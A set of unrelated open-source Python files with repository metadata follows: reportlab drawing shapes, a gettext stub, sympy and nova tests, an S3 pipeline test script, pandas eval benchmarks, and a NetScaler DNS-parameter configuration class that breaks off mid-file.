def addArc(self, centerx, centery, radius, startangledegrees, endangledegrees, yradius=None, degreedelta=None, moveTo=None, reverse=None):
P = getArcPoints(centerx, centery, radius, startangledegrees, endangledegrees, yradius=yradius, degreedelta=degreedelta, reverse=reverse)
if moveTo or not len(self.operators):
self.moveTo(P[0][0],P[0][1])
del P[0]
for x, y in P: self.lineTo(x,y)
def definePath(pathSegs=[],isClipPath=0, dx=0, dy=0, **kw):
O = []
P = []
for seg in pathSegs:
if type(seg) not in [ListType,TupleType]:
opName = seg
args = []
else:
opName = seg[0]
args = seg[1:]
if opName not in _PATH_OP_NAMES:
raise ValueError, 'bad operator name %s' % opName
op = _PATH_OP_NAMES.index(opName)
if len(args)!=_PATH_OP_ARG_COUNT[op]:
raise ValueError, '%s bad arguments %s' % (opName,str(args))
O.append(op)
P.extend(list(args))
for d,o in (dx,0), (dy,1):
for i in xrange(o,len(P),2):
P[i] = P[i]+d
return apply(Path,(P,O,isClipPath),kw)
class Rect(SolidShape):
"""Rectangle, possibly with rounded corners."""
_attrMap = AttrMap(BASE=SolidShape,
x = AttrMapValue(isNumber),
y = AttrMapValue(isNumber),
width = AttrMapValue(isNumber),
height = AttrMapValue(isNumber),
rx = AttrMapValue(isNumber),
ry = AttrMapValue(isNumber),
)
def __init__(self, x, y, width, height, rx=0, ry=0, **kw):
SolidShape.__init__(self, kw)
self.x = x
self.y = y
self.width = width
self.height = height
self.rx = rx
self.ry = ry
def copy(self):
new = self.__class__(self.x, self.y, self.width, self.height)
new.setProperties(self.getProperties())
return new
def getBounds(self):
return (self.x, self.y, self.x + self.width, self.y + self.height)
class Image(SolidShape):
"""Bitmap image."""
_attrMap = AttrMap(BASE=SolidShape,
x = AttrMapValue(isNumber),
y = AttrMapValue(isNumber),
width = AttrMapValue(isNumberOrNone),
height = AttrMapValue(isNumberOrNone),
path = AttrMapValue(None),
)
def __init__(self, x, y, width, height, path, **kw):
SolidShape.__init__(self, kw)
self.x = x
self.y = y
self.width = width
self.height = height
self.path = path
def copy(self):
new = self.__class__(self.x, self.y, self.width, self.height, self.path)
new.setProperties(self.getProperties())
return new
def getBounds(self):
return (self.x, self.y, self.x + width, self.y + width)
class Circle(SolidShape):
_attrMap = AttrMap(BASE=SolidShape,
cx = AttrMapValue(isNumber),
cy = AttrMapValue(isNumber),
r = AttrMapValue(isNumber),
)
def __init__(self, cx, cy, r, **kw):
SolidShape.__init__(self, kw)
self.cx = cx
self.cy = cy
self.r = r
def copy(self):
new = self.__class__(self.cx, self.cy, self.r)
new.setProperties(self.getProperties())
return new
def getBounds(self):
return (self.cx - self.r, self.cy - self.r, self.cx + self.r, self.cy + self.r)
class Ellipse(SolidShape):
_attrMap = AttrMap(BASE=SolidShape,
cx = AttrMapValue(isNumber),
cy = AttrMapValue(isNumber),
rx = AttrMapValue(isNumber),
ry = AttrMapValue(isNumber),
)
def __init__(self, cx, cy, rx, ry, **kw):
SolidShape.__init__(self, kw)
self.cx = cx
self.cy = cy
self.rx = rx
self.ry = ry
def copy(self):
new = self.__class__(self.cx, self.cy, self.rx, self.ry)
new.setProperties(self.getProperties())
return new
def getBounds(self):
return (self.cx - self.rx, self.cy - self.ry, self.cx + self.rx, self.cy + self.ry)
class Wedge(SolidShape):
"""A "slice of a pie" by default translates to a polygon moves anticlockwise
from start angle to end angle"""
_attrMap = AttrMap(BASE=SolidShape,
centerx = AttrMapValue(isNumber),
centery = AttrMapValue(isNumber),
radius = AttrMapValue(isNumber),
startangledegrees = AttrMapValue(isNumber),
endangledegrees = AttrMapValue(isNumber),
yradius = AttrMapValue(isNumberOrNone),
radius1 = AttrMapValue(isNumberOrNone),
yradius1 = AttrMapValue(isNumberOrNone),
)
degreedelta = 1 # jump every 1 degrees
def __init__(self, centerx, centery, radius, startangledegrees, endangledegrees, yradius=None, **kw):
SolidShape.__init__(self, kw)
while endangledegrees<startangledegrees:
endangledegrees = endangledegrees+360
#print "__init__"
self.centerx, self.centery, self.radius, self.startangledegrees, self.endangledegrees = \
centerx, centery, radius, startangledegrees, endangledegrees
self.yradius = yradius
def _xtraRadii(self):
yradius = getattr(self, 'yradius', None)
if yradius is None: yradius = self.radius
radius1 = getattr(self,'radius1', None)
yradius1 = getattr(self,'yradius1',radius1)
if radius1 is None: radius1 = yradius1
return yradius, radius1, yradius1
#def __repr__(self):
# return "Wedge"+repr((self.centerx, self.centery, self.radius, self.startangledegrees, self.endangledegrees ))
#__str__ = __repr__
def asPolygon(self):
#print "asPolygon"
centerx= self.centerx
centery = self.centery
radius = self.radius
yradius, radius1, yradius1 = self._xtraRadii()
startangledegrees = self.startangledegrees
endangledegrees = self.endangledegrees
from math import sin, cos, pi
degreestoradians = pi/180.0
startangle = startangledegrees*degreestoradians
endangle = endangledegrees*degreestoradians
while endangle<startangle:
endangle = endangle+2*pi
angle = float(endangle-startangle)
points = []
if angle>0.001:
degreedelta = min(self.degreedelta or 1.,angle)
radiansdelta = degreedelta*degreestoradians
n = max(1,int(angle/radiansdelta+0.5))
radiansdelta = angle/n
n += 1
else:
n = 1
radiansdelta = 0
CA = []
CAA = CA.append
a = points.append
for angle in xrange(n):
angle = startangle+angle*radiansdelta
CAA((cos(angle),sin(angle)))
for c,s in CA:
a(centerx+radius*c)
a(centery+yradius*s)
if (radius1==0 or radius1 is None) and (yradius1==0 or yradius1 is None):
a(centerx); a(centery)
else:
CA.reverse()
for c,s in CA:
a(centerx+radius1*c)
a(centery+yradius1*s)
return Polygon(points)
def copy(self):
new = self.__class__(self.centerx,
self.centery,
self.radius,
self.startangledegrees,
self.endangledegrees)
new.setProperties(self.getProperties())
return new
def getBounds(self):
return self.asPolygon().getBounds()
class Polygon(SolidShape):
"""Defines a closed shape; Is implicitly
joined back to the start for you."""
_attrMap = AttrMap(BASE=SolidShape,
points = AttrMapValue(isListOfNumbers),
)
def __init__(self, points=[], **kw):
SolidShape.__init__(self, kw)
assert len(points) % 2 == 0, 'Point list must have even number of elements!'
self.points = points
def copy(self):
new = self.__class__(self.points)
new.setProperties(self.getProperties())
return new
def getBounds(self):
return getPointsBounds(self.points)
class PolyLine(LineShape):
"""Series of line segments. Does not define a
closed shape; never filled even if apparently joined.
Put the numbers in the list, not two-tuples."""
_attrMap = AttrMap(BASE=LineShape,
points = AttrMapValue(isListOfNumbers),
)
def __init__(self, points=[], **kw):
LineShape.__init__(self, kw)
lenPoints = len(points)
if lenPoints:
if type(points[0]) in (ListType,TupleType):
L = []
for (x,y) in points:
L.append(x)
L.append(y)
points = L
else:
assert len(points) % 2 == 0, 'Point list must have even number of elements!'
self.points = points
def copy(self):
new = self.__class__(self.points)
new.setProperties(self.getProperties())
return new
def getBounds(self):
return getPointsBounds(self.points)
class String(Shape):
"""Not checked against the spec, just a way to make something work.
Can be anchored left, middle or end."""
# to do.
_attrMap = AttrMap(
x = AttrMapValue(isNumber),
y = AttrMapValue(isNumber),
text = AttrMapValue(isString),
fontName = AttrMapValue(None),
fontSize = AttrMapValue(isNumber),
fillColor = AttrMapValue(isColorOrNone),
textAnchor = AttrMapValue(isTextAnchor),
encoding = AttrMapValue(isString),
)
encoding = 'utf8'
def __init__(self, x, y, text, **kw):
self.x = x
self.y = y
self.text = text
self.textAnchor = 'start'
self.fontName = STATE_DEFAULTS['fontName']
self.fontSize = STATE_DEFAULTS['fontSize']
self.fillColor = STATE_DEFAULTS['fillColor']
self.setProperties(kw)
def getEast(self):
return self.x + stringWidth(self.text,self.fontName,self.fontSize, self.encoding)
def copy(self):
new = self.__class__(self.x, self.y, self.text)
new.setProperties(self.getProperties())
return new
def getBounds(self):
# assumes constant drop of 0.2*size to baseline
w = stringWidth(self.text,self.fontName,self.fontSize,self.encoding)
if self.textAnchor == 'start':
x = self.x
elif self.textAnchor == 'middle':
x = self.x - 0.5*w
elif self.textAnchor == 'end':
x = self.x - w
return (x, self.y - 0.2 * self.fontSize, x+w, self.y + self.fontSize)
class UserNode(_DrawTimeResizeable):
"""A simple template for creating a new node. The user (Python
programmer) may subclasses this. provideNode() must be defined to
provide a Shape primitive when called by a renderer. It does
NOT inherit from Shape, as the renderer always replaces it, and
your own classes can safely inherit from it without getting
lots of unintended behaviour."""
def provideNode(self):
"""Override this to create your own node. This lets widgets be
added to drawings; they must create a shape (typically a group)
so that the renderer can draw the custom node."""
raise NotImplementedError, "this method must be redefined by the user/programmer"
def test():
r = Rect(10,10,200,50)
import pprint
pp = pprint.pprint
print 'a Rectangle:'
pp(r.getProperties())
print
print 'verifying...',
r.verify()
print 'OK'
#print 'setting rect.z = "spam"'
#r.z = 'spam'
print 'deleting rect.width'
del r.width
print 'verifying...',
r.verify()
if __name__=='__main__':
test()
| {
"content_hash": "fdaab552dd6016505cf0c58512b53f8b",
"timestamp": "",
"source": "github",
"line_count": 1301,
"max_line_length": 159,
"avg_line_length": 35.32436587240584,
"alnum_prop": 0.5757338381530561,
"repo_name": "alexissmirnov/donomo",
"id": "03622906110ef2a6c608341fc8aeddba6656bbb1",
"size": "46145",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "donomo_archive/lib/reportlab/graphics/shapes.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "360712"
},
{
"name": "Python",
"bytes": "7155992"
},
{
"name": "Shell",
"bytes": "391"
}
],
"symlink_target": ""
} |
import gettext
from core import config
_ = gettext.translation('message', config.localesDir).ugettext
| {
"content_hash": "b80127905ef7b25b7a97b6eb4de86d1c",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 62,
"avg_line_length": 25.75,
"alnum_prop": 0.7961165048543689,
"repo_name": "rrpg/world-editor",
"id": "adb175f6af5f1925db6dfebe221c45a97f2f6654",
"size": "103",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/localisation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "3511"
},
{
"name": "Python",
"bytes": "73427"
},
{
"name": "Shell",
"bytes": "80"
}
],
"symlink_target": ""
} |
from sympy import I, Matrix
from sympy.physics.quantum import hbar, represent, Commutator
from sympy.physics.quantum import apply_operators
from sympy.physics.quantum.spin import *
def test_represent():
assert represent(Jz) == hbar*Matrix([[1,0],[0,-1]])/2
assert represent(Jz, j=1) == hbar*Matrix([[1,0,0],[0,0,0],[0,0,-1]])
def test_jplus():
assert Commutator(Jplus, Jminus).doit() == 2*hbar*Jz
assert apply_operators(Jplus*JzKet(1,1)) == 0
assert Jplus.matrix_element(1,1,1,1) == 0
assert Jplus.rewrite('xyz') == Jx + I*Jy
| {
"content_hash": "b45df0a426bbaac450b64c9b84ae600a",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 72,
"avg_line_length": 34.625,
"alnum_prop": 0.6750902527075813,
"repo_name": "tarballs-are-good/sympy",
"id": "47dacc3ea6da5a173554c3438b4361fa9bace3db",
"size": "554",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sympy/physics/quantum/tests/test_spin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from oslo_config import cfg
from nova import exception
from nova.tests.functional.api_sample_tests import test_servers
from nova.tests.unit.objects import test_network
from nova.tests.unit import utils as test_utils
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class FixedIpTest(test_servers.ServersSampleBase):
extension_name = "os-fixed-ips"
microversion = None
def _get_flags(self):
f = super(FixedIpTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.fixed_ips.Fixed_ips')
return f
def setUp(self):
super(FixedIpTest, self).setUp()
instance = dict(test_utils.get_test_instance(),
hostname='openstack', host='host')
fake_fixed_ips = [{'id': 1,
'address': '192.168.1.1',
'network_id': 1,
'virtual_interface_id': 1,
'instance_uuid': '1',
'allocated': False,
'leased': False,
'reserved': False,
'created_at': None,
'deleted_at': None,
'updated_at': None,
'deleted': None,
'instance': instance,
'network': test_network.fake_network,
'host': None},
{'id': 2,
'address': '192.168.1.2',
'network_id': 1,
'virtual_interface_id': 2,
'instance_uuid': '2',
'allocated': False,
'leased': False,
'reserved': False,
'created_at': None,
'deleted_at': None,
'updated_at': None,
'deleted': None,
'instance': instance,
'network': test_network.fake_network,
'host': None},
]
def fake_fixed_ip_get_by_address(context, address,
columns_to_join=None):
for fixed_ip in fake_fixed_ips:
if fixed_ip['address'] == address:
return fixed_ip
raise exception.FixedIpNotFoundForAddress(address=address)
def fake_fixed_ip_update(context, address, values):
fixed_ip = fake_fixed_ip_get_by_address(context, address)
if fixed_ip is None:
raise exception.FixedIpNotFoundForAddress(address=address)
else:
for key in values:
fixed_ip[key] = values[key]
self.stub_out("nova.db.fixed_ip_get_by_address",
fake_fixed_ip_get_by_address)
self.stub_out("nova.db.fixed_ip_update", fake_fixed_ip_update)
def test_fixed_ip_reserve(self):
# Reserve a Fixed IP.
response = self._do_post('os-fixed-ips/192.168.1.1/action',
'fixedip-post-req', {},
api_version=self.microversion)
self.assertEqual(202, response.status_code)
self.assertEqual("", response.content)
def _test_get_fixed_ip(self, **kwargs):
# Return data about the given fixed ip.
response = self._do_get('os-fixed-ips/192.168.1.1',
api_version=self.microversion)
project = {'cidr': '192.168.1.0/24',
'hostname': 'openstack',
'host': 'host',
'address': '192.168.1.1'}
project.update(**kwargs)
self._verify_response('fixedips-get-resp', project, response, 200)
def test_get_fixed_ip(self):
self._test_get_fixed_ip()
class FixedIpV24Test(FixedIpTest):
microversion = '2.4'
# NOTE(gmann): microversion tests do not need to run for v2 API
# so defining scenarios only for v2.4 which will run the original tests
# by appending '(v2_4)' in test_id.
scenarios = [('v2_4', {'api_major_version': 'v2.1'})]
def test_get_fixed_ip(self):
self._test_get_fixed_ip(reserved=False)
| {
"content_hash": "d810a937e3f8a6f1d78c7d669ec96686",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 75,
"avg_line_length": 38.24107142857143,
"alnum_prop": 0.5199626430072379,
"repo_name": "dims/nova",
"id": "2cf6b10bd2ec5a9bd089624d067d63675feb4fbf",
"size": "4885",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/tests/functional/api_sample_tests/test_fixed_ips.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16952469"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "317320"
}
],
"symlink_target": ""
} |
import sys
import boto3
def testJob(txtfile):
with open(txtfile, "r") as f:
newFile = open("output.txt", "w")
newFile.write(str(f.readline()) + "WORLD")
newFile.close()
return newFile.name
def getData(key, datadir):
s3 = boto3.resource('s3')
filename = datadir + '/' + key
data = s3.meta.client.download_file('nddtestbucket', key, filename)
return filename
def uploadResults(key, results):
s3 = boto3.resource('s3')
key = key.split(".")[0] + 'results' + '.txt'
data = open(results, 'rb')
s3.Bucket('nddtestbucketresults').put_object(Key=key, Body=data)
return key
output = testJob(getData(sys.argv[1], 'data'))
uploadResults(sys.argv[1], output)
| {
"content_hash": "57ad368568b5ba4444d589a0b1f3e893",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 71,
"avg_line_length": 28.72,
"alnum_prop": 0.6364902506963789,
"repo_name": "NeuroDataDesign/pan-synapse",
"id": "4b8b8387c81b61ca57a6485c1ccf4514dda2b34b",
"size": "718",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pipeline_1/code/service/cloud/testjob.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "22326"
},
{
"name": "HTML",
"bytes": "22226"
},
{
"name": "Jupyter Notebook",
"bytes": "183044371"
},
{
"name": "Python",
"bytes": "95352"
}
],
"symlink_target": ""
} |
import numpy as np
import pandas as pd
try:
import pandas.core.computation.expressions as expr
except ImportError:
import pandas.computation.expressions as expr
class Eval:
params = [["numexpr", "python"], [1, "all"]]
param_names = ["engine", "threads"]
def setup(self, engine, threads):
self.df = pd.DataFrame(np.random.randn(20000, 100))
self.df2 = pd.DataFrame(np.random.randn(20000, 100))
self.df3 = pd.DataFrame(np.random.randn(20000, 100))
self.df4 = pd.DataFrame(np.random.randn(20000, 100))
if threads == 1:
expr.set_numexpr_threads(1)
def time_add(self, engine, threads):
pd.eval("self.df + self.df2 + self.df3 + self.df4", engine=engine)
def time_and(self, engine, threads):
pd.eval(
"(self.df > 0) & (self.df2 > 0) & (self.df3 > 0) & (self.df4 > 0)",
engine=engine,
)
def time_chained_cmp(self, engine, threads):
pd.eval("self.df < self.df2 < self.df3 < self.df4", engine=engine)
def time_mult(self, engine, threads):
pd.eval("self.df * self.df2 * self.df3 * self.df4", engine=engine)
def teardown(self, engine, threads):
expr.set_numexpr_threads()
class Query:
def setup(self):
N = 10 ** 6
halfway = (N // 2) - 1
index = pd.date_range("20010101", periods=N, freq="T")
s = pd.Series(index)
self.ts = s.iloc[halfway]
self.df = pd.DataFrame({"a": np.random.randn(N), "dates": index}, index=index)
data = np.random.randn(N)
self.min_val = data.min()
self.max_val = data.max()
def time_query_datetime_index(self):
self.df.query("index < @self.ts")
def time_query_datetime_column(self):
self.df.query("dates < @self.ts")
def time_query_with_boolean_selection(self):
self.df.query("(a >= @self.min_val) & (a <= @self.max_val)")
from .pandas_vb_common import setup # noqa: F401 isort:skip
| {
"content_hash": "cf5bf4fe56ebd47195d4b59cbacb5d3e",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 86,
"avg_line_length": 30.136363636363637,
"alnum_prop": 0.5922574157868276,
"repo_name": "TomAugspurger/pandas",
"id": "cbab9fdc9c0baeec0a126a670595a98a52e2e3a7",
"size": "1989",
"binary": false,
"copies": "7",
"ref": "refs/heads/main",
"path": "asv_bench/benchmarks/eval.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "257"
},
{
"name": "C",
"bytes": "352075"
},
{
"name": "CSS",
"bytes": "979"
},
{
"name": "Cython",
"bytes": "1029090"
},
{
"name": "Dockerfile",
"bytes": "1756"
},
{
"name": "HTML",
"bytes": "454789"
},
{
"name": "Makefile",
"bytes": "473"
},
{
"name": "Python",
"bytes": "14680580"
},
{
"name": "Shell",
"bytes": "31513"
},
{
"name": "Smarty",
"bytes": "2126"
}
],
"symlink_target": ""
} |
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class dnsparameter(base_resource) :
""" Configuration for DNS parameter resource. """
def __init__(self) :
self._retries = 0
self._minttl = 0
self._maxttl = 0
self._cacherecords = ""
self._namelookuppriority = ""
self._recursion = ""
self._resolutionorder = ""
self._dnssec = ""
self._maxpipeline = 0
self._dnsrootreferral = ""
self._dns64timeout = 0
@property
def retries(self) :
ur"""Maximum number of retry attempts when no response is received for a query sent to a name server. Applies to end resolver and forwarder configurations.<br/>Default value: 5<br/>Minimum length = 1<br/>Maximum length = 5.
"""
try :
return self._retries
except Exception as e:
raise e
@retries.setter
def retries(self, retries) :
ur"""Maximum number of retry attempts when no response is received for a query sent to a name server. Applies to end resolver and forwarder configurations.<br/>Default value: 5<br/>Minimum length = 1<br/>Maximum length = 5
"""
try :
self._retries = retries
except Exception as e:
raise e
@property
def minttl(self) :
ur"""Minimum permissible time to live (TTL) for all records cached in the DNS cache by DNS proxy, end resolver, and forwarder configurations. If the TTL of a record that is to be cached is lower than the value configured for minTTL, the TTL of the record is set to the value of minTTL before caching. When you modify this setting, the new value is applied only to those records that are cached after the modification. The TTL values of existing records are not changed.<br/>Maximum length = 604800.
"""
try :
return self._minttl
except Exception as e:
raise e
@minttl.setter
def minttl(self, minttl) :
ur"""Minimum permissible time to live (TTL) for all records cached in the DNS cache by DNS proxy, end resolver, and forwarder configurations. If the TTL of a record that is to be cached is lower than the value configured for minTTL, the TTL of the record is set to the value of minTTL before caching. When you modify this setting, the new value is applied only to those records that are cached after the modification. The TTL values of existing records are not changed.<br/>Maximum length = 604800
"""
try :
self._minttl = minttl
except Exception as e:
raise e
@property
def maxttl(self) :
ur"""Maximum time to live (TTL) for all records cached in the DNS cache by DNS proxy, end resolver, and forwarder configurations. If the TTL of a record that is to be cached is higher than the value configured for maxTTL, the TTL of the record is set to the value of maxTTL before caching. When you modify this setting, the new value is applied only to those records that are cached after the modification. The TTL values of existing records are not changed.<br/>Default value: 604800<br/>Minimum length = 1<br/>Maximum length = 604800.
"""
try :
return self._maxttl
except Exception as e:
raise e
@maxttl.setter
def maxttl(self, maxttl) :
ur"""Maximum time to live (TTL) for all records cached in the DNS cache by DNS proxy, end resolver, and forwarder configurations. If the TTL of a record that is to be cached is higher than the value configured for maxTTL, the TTL of the record is set to the value of maxTTL before caching. When you modify this setting, the new value is applied only to those records that are cached after the modification. The TTL values of existing records are not changed.<br/>Default value: 604800<br/>Minimum length = 1<br/>Maximum length = 604800
"""
try :
self._maxttl = maxttl
except Exception as e:
raise e
@property
def cacherecords(self) :
ur"""Cache resource records in the DNS cache. Applies to resource records obtained through proxy configurations only. End resolver and forwarder configurations always cache records in the DNS cache, and you cannot disable this behavior. When you disable record caching, the appliance stops caching server responses. However, cached records are not flushed. The appliance does not serve requests from the cache until record caching is enabled again.<br/>Default value: YES<br/>Possible values = YES, NO.
"""
try :
return self._cacherecords
except Exception as e:
raise e
@cacherecords.setter
def cacherecords(self, cacherecords) :
ur"""Cache resource records in the DNS cache. Applies to resource records obtained through proxy configurations only. End resolver and forwarder configurations always cache records in the DNS cache, and you cannot disable this behavior. When you disable record caching, the appliance stops caching server responses. However, cached records are not flushed. The appliance does not serve requests from the cache until record caching is enabled again.<br/>Default value: YES<br/>Possible values = YES, NO
"""
try :
self._cacherecords = cacherecords
except Exception as e:
raise e
@property
def namelookuppriority(self) :
ur"""Type of lookup (DNS or WINS) to attempt first. If the first-priority lookup fails, the second-priority lookup is attempted. Used only by the SSL VPN feature.<br/>Default value: WINS<br/>Possible values = WINS, DNS.
"""
try :
return self._namelookuppriority
except Exception as e:
raise e
@namelookuppriority.setter
def namelookuppriority(self, namelookuppriority) :
ur"""Type of lookup (DNS or WINS) to attempt first. If the first-priority lookup fails, the second-priority lookup is attempted. Used only by the SSL VPN feature.<br/>Default value: WINS<br/>Possible values = WINS, DNS
"""
try :
self._namelookuppriority = namelookuppriority
except Exception as e:
raise e
@property
def recursion(self) :
ur"""Function as an end resolver and recursively resolve queries for domains that are not hosted on the NetScaler appliance. Also resolve queries recursively when the external name servers configured on the appliance (for a forwarder configuration) are unavailable. When external name servers are unavailable, the appliance queries a root server and resolves the request recursively, as it does for an end resolver configuration.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._recursion
except Exception as e:
raise e
@recursion.setter
def recursion(self, recursion) :
ur"""Function as an end resolver and recursively resolve queries for domains that are not hosted on the NetScaler appliance. Also resolve queries recursively when the external name servers configured on the appliance (for a forwarder configuration) are unavailable. When external name servers are unavailable, the appliance queries a root server and resolves the request recursively, as it does for an end resolver configuration.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._recursion = recursion
except Exception as e:
raise e
@property
def resolutionorder(self) :
ur"""Type of DNS queries (A, AAAA, or both) to generate during the routine functioning of certain NetScaler features, such as SSL VPN, cache redirection, and the integrated cache. The queries are sent to the external name servers that are configured for the forwarder function. If you specify both query types, you can also specify the order. Available settings function as follows:
* OnlyAQuery. Send queries for IPv4 address records (A records) only.
* OnlyAAAAQuery. Send queries for IPv6 address records (AAAA records) instead of queries for IPv4 address records (A records).
* AThenAAAAQuery. Send a query for an A record, and then send a query for an AAAA record if the query for the A record results in a NODATA response from the name server.
* AAAAThenAQuery. Send a query for an AAAA record, and then send a query for an A record if the query for the AAAA record results in a NODATA response from the name server.<br/>Default value: OnlyAQuery<br/>Possible values = OnlyAQuery, OnlyAAAAQuery, AThenAAAAQuery, AAAAThenAQuery.
"""
try :
return self._resolutionorder
except Exception as e:
raise e
@resolutionorder.setter
def resolutionorder(self, resolutionorder) :
ur"""Type of DNS queries (A, AAAA, or both) to generate during the routine functioning of certain NetScaler features, such as SSL VPN, cache redirection, and the integrated cache. The queries are sent to the external name servers that are configured for the forwarder function. If you specify both query types, you can also specify the order. Available settings function as follows:
* OnlyAQuery. Send queries for IPv4 address records (A records) only.
* OnlyAAAAQuery. Send queries for IPv6 address records (AAAA records) instead of queries for IPv4 address records (A records).
* AThenAAAAQuery. Send a query for an A record, and then send a query for an AAAA record if the query for the A record results in a NODATA response from the name server.
* AAAAThenAQuery. Send a query for an AAAA record, and then send a query for an A record if the query for the AAAA record results in a NODATA response from the name server.<br/>Default value: OnlyAQuery<br/>Possible values = OnlyAQuery, OnlyAAAAQuery, AThenAAAAQuery, AAAAThenAQuery
"""
try :
self._resolutionorder = resolutionorder
except Exception as e:
raise e
@property
def dnssec(self) :
ur"""Enable or disable the Domain Name System Security Extensions (DNSSEC) feature on the appliance. Note: Even when the DNSSEC feature is enabled, forwarder configurations (used by internal NetScaler features such as SSL VPN and Cache Redirection for name resolution) do not support the DNSSEC OK (DO) bit in the EDNS0 OPT header.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._dnssec
except Exception as e:
raise e
@dnssec.setter
def dnssec(self, dnssec) :
ur"""Enable or disable the Domain Name System Security Extensions (DNSSEC) feature on the appliance. Note: Even when the DNSSEC feature is enabled, forwarder configurations (used by internal NetScaler features such as SSL VPN and Cache Redirection for name resolution) do not support the DNSSEC OK (DO) bit in the EDNS0 OPT header.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._dnssec = dnssec
except Exception as e:
raise e
@property
def maxpipeline(self) :
ur"""Maximum number of concurrent DNS requests to allow on a single client connection, which is identified by the <clientip:port>-<vserver ip:port> tuple. A value of 0 (zero) applies no limit to the number of concurrent DNS requests allowed on a single client connection.
"""
try :
return self._maxpipeline
except Exception as e:
raise e
@maxpipeline.setter
def maxpipeline(self, maxpipeline) :
ur"""Maximum number of concurrent DNS requests to allow on a single client connection, which is identified by the <clientip:port>-<vserver ip:port> tuple. A value of 0 (zero) applies no limit to the number of concurrent DNS requests allowed on a single client connection.
"""
try :
self._maxpipeline = maxpipeline
except Exception as e:
raise e
@property
def dnsrootreferral(self) :
ur"""Send a root referral if a client queries a domain name that is unrelated to the domains configured/cached on the NetScaler appliance. If the setting is disabled, the appliance sends a blank response instead of a root referral. Applicable to domains for which the appliance is authoritative. Disable the parameter when the appliance is under attack from a client that is sending a flood of queries for unrelated domains.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._dnsrootreferral
except Exception as e:
raise e
@dnsrootreferral.setter
def dnsrootreferral(self, dnsrootreferral) :
ur"""Send a root referral if a client queries a domain name that is unrelated to the domains configured/cached on the NetScaler appliance. If the setting is disabled, the appliance sends a blank response instead of a root referral. Applicable to domains for which the appliance is authoritative. Disable the parameter when the appliance is under attack from a client that is sending a flood of queries for unrelated domains.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._dnsrootreferral = dnsrootreferral
except Exception as e:
raise e
@property
def dns64timeout(self) :
ur"""While doing DNS64 resolution, this parameter specifies the time to wait before sending an A query if no response is received from backend DNS server for AAAA query.<br/>Maximum length = 10000.
"""
try :
return self._dns64timeout
except Exception as e:
raise e
@dns64timeout.setter
def dns64timeout(self, dns64timeout) :
ur"""While doing DNS64 resolution, this parameter specifies the time to wait before sending an A query if no response is received from backend DNS server for AAAA query.<br/>Maximum length = 10000
"""
try :
self._dns64timeout = dns64timeout
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(dnsparameter_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.dnsparameter
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
return 0
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
ur""" Use this API to update dnsparameter.
"""
try :
if type(resource) is not list :
updateresource = dnsparameter()
updateresource.retries = resource.retries
updateresource.minttl = resource.minttl
updateresource.maxttl = resource.maxttl
updateresource.cacherecords = resource.cacherecords
updateresource.namelookuppriority = resource.namelookuppriority
updateresource.recursion = resource.recursion
updateresource.resolutionorder = resource.resolutionorder
updateresource.dnssec = resource.dnssec
updateresource.maxpipeline = resource.maxpipeline
updateresource.dnsrootreferral = resource.dnsrootreferral
updateresource.dns64timeout = resource.dns64timeout
return updateresource.update_resource(client)
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
ur""" Use this API to unset the properties of dnsparameter resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = dnsparameter()
return unsetresource.unset_resource(client, args)
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
ur""" Use this API to fetch all the dnsparameter resources that are configured on netscaler.
"""
try :
if not name :
obj = dnsparameter()
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
class Cacherecords:
YES = "YES"
NO = "NO"
class Recursion:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Resolutionorder:
OnlyAQuery = "OnlyAQuery"
